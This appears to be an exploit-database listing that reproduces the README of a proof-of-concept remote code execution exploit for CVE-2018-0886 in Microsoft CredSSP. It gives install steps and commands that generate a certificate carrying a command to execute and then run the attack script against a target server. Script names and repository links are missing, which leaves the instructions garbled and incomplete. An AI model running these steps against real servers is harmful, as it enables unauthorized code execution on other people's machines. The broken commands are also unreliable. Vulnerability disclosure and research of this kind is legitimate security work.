Microsoft Credential Security Support Provider - Remote Code Execution Vulnerability

ID 1337DAY-ID-30174
Type zdt
Reporter Preempt
Modified 2018-04-14T00:00:00


Exploit for windows platform in category remote exploits

                                            # credssp
This is a poc code for exploiting CVE-2018-0886. It should be used for educational purposes only.
It relies on a fork of the rdpy project(, allowing also credssp relay. 
Written by Eyal Karni, Preempt 
[email protected] 
# Build
## Instructions (Linux)
If you are using Ubuntu 14 , check the install file.. 
It was tested on Ubuntu 16.04. 
$ git clone rdpy
$ git clone 
$ cd credssp/install
$ sh
$ cd ../../rdpy
$ sudo python install
EDB Mirror:
* It assumes a pretty clean inital state. Best to uninstall first relevant compontants such as cryptography,pyopenssl maybe (pip uninstall cryptography).  
* A different version of openssl needed to be installed for this to run successfully.  The install script does that. 
* Please follow the instructions in the described order. 
# Running the exploit 
Export a certificate suitable for Server Authentication from any domain.
To generate a suitable certificate for the command to execute : 
$ python credssp/bin/ -c ExportedCert -o exploitc.pem -k exploitk.pem CMD 
(exploitc.pem ,exploitk.pem are the generated certificate and private key respectively)
To run the attack script: 
$ python /usr/local/bin/ -k exploitk.pem -c exploitc.pem TargetServer
More details are in the usage section of the scripts(--help).

# [2018-04-14]  #